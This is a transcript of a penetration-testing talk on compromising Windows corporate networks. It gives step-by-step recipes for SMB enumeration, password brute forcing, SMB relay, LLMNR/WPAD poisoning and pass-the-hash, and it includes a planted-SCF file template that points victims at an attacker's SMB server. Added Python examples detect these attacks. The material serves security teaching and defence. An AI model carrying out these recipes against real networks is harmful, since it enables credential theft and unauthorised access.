Pwning Corporate Networks in a Single Day, by Paulino Calderón Pale
TRANSCRIPT
PWNING NETWORKS IN A SINGLE DAY
# cat /etc/about
Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com
THINGS I LEARNED
• 99% of the time it will be Windows.
• Most of the vulnerabilities are unknown until companies get professional help.
• No one knows what software is installed.
• Default configurations are dangerous.
[Figure: SMB dialect timeline showing versions 1.0, 2.0, 2.1, 3.0 and 3.02]
SMB IS OUR FRIEND
SMB is the most targeted protocol in Windows networks.
With SMB:
• Obtain OS and Active Directory information.
• Steal user network credentials.
• Access shared folders.
• Test credentials.
• Execute commands or binaries remotely (PsExec, WMI, PowerShell…).
• A lot of vulnerable implementations (servers and clients)…
DOMAIN CONTROLLERS
• A lot of domain controllers accept null sessions.
• This insecure configuration reveals information about users and groups.
• We can use this vulnerability to target high privileged users.
OBTAINING INFORMATION FROM A DOMAIN CONTROLLER
enum4linux 0.9 saves users in text files divided by domain groups. The output can be used by Nmap and Metasploit.
Download: https://github.com/cldrn/enum4linux-0.9
DOMAIN\USER
OBTAINING INFORMATION FROM DOMAIN CONTROLLERS
polenum obtains the password policy for a domain.
Download from https://labs.portcullis.co.uk/tools/polenum/
“QUICKPWN”
• Identify DCs.
• Execute enum4linux 0.9:
  $ enum4linux -a <IP>
• Execute polenum to obtain the password and account lockout policies:
  polenum <IP>
• Launch a brute force attack to find accounts with weak passwords:
  Metasploit: auxiliary/scanner/smb/smb_login
  Nmap: smb-brute
SHARED FOLDERS
• Enabled to allow people to share files over the network.
• Not uncommon to find sensitive information stored there.
“QUICKPWN”
• Find sensitive information in shared folders:
  • FileLocator Lite or Pro (www.mythicsoft.com)
  • smbmap
STEALING USER CREDENTIALS
• There are several techniques that can be used to abuse shared folders to obtain user credentials.
• No patch (vulnerable by design).
THE CLASSIC SMB CAPTURE ATTACK
As easy as setting up an SMB server and waiting for users to send us their domain credentials…
DEMO
WHO HAS THE TIME TO WAIT?
UNC PATHS
\\<MACHINE>\<FOLDER>\<FILE>
WHERE CAN WE USE UNC PATHS?
• Web applications / SharePoint / your own web server
• SQL queries
• Office documents
• lmhosts.sam <- host your own malicious hosts file
• LNK files
• SCF files <- easier to create than LNK files
“QUICKPWN”
• Find a shared folder with write permissions.
• Upload a file containing a UNC path pointing to your SMB server.
• Wait for the credentials…
SCF FILES
[Shell]
Command=2
IconFile=\\<IP address>\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
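The same SCF template seen from the other side: an added example (mine, not from the talk) that parses SCF files found on a writable share and flags any value that is a UNC path to a host outside an allow-list. TRUSTED_HOSTS and the two sample files are constructed values.

```python
import re
from pathlib import Path

# Hosts allowed to serve files over UNC paths; assumption: the defender keeps this list.
TRUSTED_HOSTS = {"fs01", "fs01.corp.example"}  # constructed values
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")        # \\host\share\... -> capture host

def parse_scf(text):
    """Parse the INI-like SCF format into {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def scf_findings(text):
    """Return [(key, host)] for each value that is a UNC path to an untrusted host."""
    findings = []
    for section in parse_scf(text).values():
        for key, value in section.items():
            m = UNC_RE.match(value)
            if m and m.group(1).lower() not in TRUSTED_HOSTS:
                findings.append((key, m.group(1)))
    return findings

def scan_texts(files):
    """files: {path: content}. Report only .scf files that point at untrusted hosts."""
    report = {}
    for path, content in files.items():
        hits = scf_findings(content) if path.lower().endswith(".scf") else []
        if hits:
            report[path] = hits
    return report

def scan_share(root):
    """Walk a mounted share on disk and feed every .scf file to scan_texts()."""
    files = {str(p): p.read_text(errors="replace")
             for p in Path(root).rglob("*") if p.is_file() and p.suffix.lower() == ".scf"}
    return scan_texts(files)

# Constructed samples: PLANTED_SCF follows the template shown on the slide.
PLANTED_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\pwn.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\fs01\\icons\\desktop.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
```

Run scan_share() against a mounted copy of each writable share on a schedule; a new SCF pointing outside the allow-list is a reliable sign that someone is harvesting credentials the way the slide describes.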
DEMO
SMB RELAY ATTACKS
If SMB signing is disabled, SMB relay attacks are possible.
99.9% of the time SMB signing is disabled on Windows workstations (default configuration).
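Added example, not from the talk: a parser for the SMB2 NEGOTIATE response that reports the dialect and whether the server merely enables signing (the workstation default described above) or requires it, which is the setting that actually closes the relay window. build_negotiate_response is a constructed fixture, not a real capture.

```python
import struct, uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # header flag: this is a response
SIGNING_ENABLED = 0x0001                 # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002                # SMB2_NEGOTIATE_SIGNING_REQUIRED
CAP_ENCRYPTION = 0x00000040              # SMB2_GLOBAL_CAP_ENCRYPTION (SMB 3.0/3.0.2)
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}

def parse_negotiate_response(pkt):
    """Parse a raw SMB2 NEGOTIATE response (64-byte header + fixed body)."""
    if len(pkt) < 128 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not a complete SMB2 message")
    hdr_size, = struct.unpack_from("<H", pkt, 4)
    command, = struct.unpack_from("<H", pkt, 12)
    flags, = struct.unpack_from("<I", pkt, 16)
    if hdr_size != 64 or command != 0 or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not an SMB2 NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    capabilities, = struct.unpack_from("<I", pkt, 88)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
        "encryption_capable": bool(capabilities & CAP_ENCRYPTION),
    }

def relay_exposed(info):
    """Only 'required' closes the relay window; 'enabled' alone still accepts unsigned sessions."""
    return not info["signing_required"]

def build_negotiate_response(dialect, security_mode, capabilities=0):
    """Constructed fixture (not a capture): minimal, well-formed NEGOTIATE response."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1,
                                      SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0) + b"\x00" * 16
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + uuid.uuid4().bytes
    body += struct.pack("<IIIIQQHHI", capabilities, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body

if __name__ == "__main__":
    for sample in (build_negotiate_response(0x0210, SIGNING_ENABLED),
                   build_negotiate_response(0x0302, SIGNING_ENABLED | SIGNING_REQUIRED, CAP_ENCRYPTION)):
        info = parse_negotiate_response(sample)
        print(info, "relay exposed" if relay_exposed(info) else "signing required")
```

Feed it the NEGOTIATE response bytes from a capture (the SMB2 message after the 4-byte NetBIOS length prefix) to inventory which hosts still answer with only SIGNING_ENABLED.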
DEMO
“QUICKPWN”
• Find a shared folder with write permissions.
• Upload a file with a UNC path pointing to your own SMB server.
• Use smbrelayx.py to redirect the connection to your victim and gain access to the machine when a user with enough privileges connects…
CAN YOU FORCE USERS TO CONNECT TO US?
• The previous attack techniques needed:
  • Users connecting to our SMB server
  • Access to a shared folder with write permissions
But can we use poisoning attacks to force users to connect to us?
THANK YOU WPAD
• Enabled by default in all Windows versions.
• Designed to auto-configure proxies in networks.
• Internet Options > LAN Settings > Automatically detect settings
LLMNR AND NBT-NS
• Enabled in most Windows machines.
• LLMNR (Link-Local Multicast Name Resolution) <- starting from Windows Vista
• NBT-NS (NetBIOS Name Service)
• Allowed in a lot of networks with restrictive access.
“QUICKPWN”
• Detect WPAD/LLMNR/NBT-NS requests on the network.
• Launch an SMB server to capture user credentials.
• Force users to connect to you through poisoning attacks.
• Capture the user credentials.
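Added example from the detection side, not from the talk: a minimal LLMNR message parser plus a check that flags any host answering for canary names (names no legitimate host owns, so only a poisoner responds to them). build_llmnr and the addresses are constructed.

```python
import socket, struct

QR = 0x8000  # header flag: message is a response

def _read_name(buf, off):
    """Decode a DNS-style name; a 0xC0 pointer ends it at an earlier copy."""
    labels = []
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:
            ptr = struct.unpack_from(">H", buf, off)[0] & 0x3FFF
            return ".".join(labels + [_read_name(buf, ptr)[0]]).lower(), off + 2
        off += 1
        if length == 0:
            return ".".join(labels).lower(), off
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length

def parse_llmnr(buf):
    """Return (is_response, question names, [(name, ipv4)] from A answers)."""
    _txid, flags, qd, an = struct.unpack_from(">HHHH", buf, 0)
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = _read_name(buf, off)
        off, questions = off + 4, questions + [name]  # skip QTYPE + QCLASS
    for _ in range(an):
        name, off = _read_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from(">HHIH", buf, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(buf[off:off + 4])))
        off += rdlen
    return bool(flags & QR), questions, answers

def detect_poisoning(datagrams, canary_names):
    """Flag responses for canary names (names no host owns): only a poisoner answers them."""
    alerts = []
    for src, payload in datagrams:
        is_resp, _q, answers = parse_llmnr(payload)
        alerts += [(src, n, ip) for n, ip in answers if is_resp and n in canary_names]
    return alerts

def build_llmnr(txid, name, answer_ip=None):
    """Constructed fixture (not a capture): a query, or a response when answer_ip is set."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    msg = struct.pack(">HHHHHH", txid, QR if answer_ip else 0, 1, 1 if answer_ip else 0, 0, 0)
    msg += qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    if answer_ip:  # answer name = pointer (0xC00C) to the question name at offset 12
        msg += b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return msg
```

In practice a monitoring host periodically sends queries for the canary names itself and feeds every UDP/5355 datagram it sees to detect_poisoning(); wpad is a useful canary on networks that do not deploy WPAD.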
DEMO
PASS THE HASH
• It has been around for almost 20 years now.
• A lot of Windows protocols require the hash of the password but not the actual password to authenticate.
• A lot of available tools support PtH:
  • pth-winexe, Mimikatz
  • Metasploit: psexec_command, psexec
PTH AGAINST RDP
Microsoft introduced "Restricted Admin" mode; now we can use PtH against RDP in Windows 2012 R2 and Windows 8.1 (admin only).
MEET PSEXEC
• Useful to locate systems that share passwords.
• Runs commands or binaries remotely on machines.
• It is very noisy.
DEMO
WDIGEST
• Authentication provider that requires Windows to store a plaintext version of the passwords in memory.
• WCE, Mimikatz FTW
CREDMAP – THE CREDENTIAL MAPPER
Developed by Roberto Salgado from Websec to quickly test credentials against different online services.
Download: https://github.com/lightos/credmap
DEMO
WMI
• PsExec alternative
• Does not start a service
• Does not touch the disk
• In Kali: wmiexec and pth-wmis
PENTESTERS LOVE POWERSHELL
PowerShell can be used for everything from network reconnaissance to privilege escalation.
Projects worth mentioning:
• PowerSploit: https://github.com/PowerShellMafia/PowerSploit/
• Empire: http://www.powershellempire.com
SMB1 VS SMB2 VS SMB3
• Most tools only work with SMB1 (for now).
• SMB2 removes OS fingerprint information pre-auth.
• SMB3 finally introduces message encryption.
DEMO
OTHER “QUICKPWNS”
• Kerberos Golden Ticket
• Outdated software
• Services with excessive permissions
• Misconfigured network printers
• Development environments with insecure configurations
• Insecure update systems (*)
DEMO
WHAT OTHER VULNERABILITIES ARE WORTH MENTIONING?
SPAM
OWASP Riviera Maya
Nmap: Network Exploration and Security Auditing Cookbook, 2nd Edition
WEBSEC OFFICIAL CHANNELS
• WWW: www.websec.mx
• YouTube: youtube.com/websecmx
• Facebook: websec.mx
• Twitter: @_websec
CONTACT
Paulino Calderón Pale
Twitter: @calderpwn
GitHub: github.com/cldrn/
www.calderonpale.com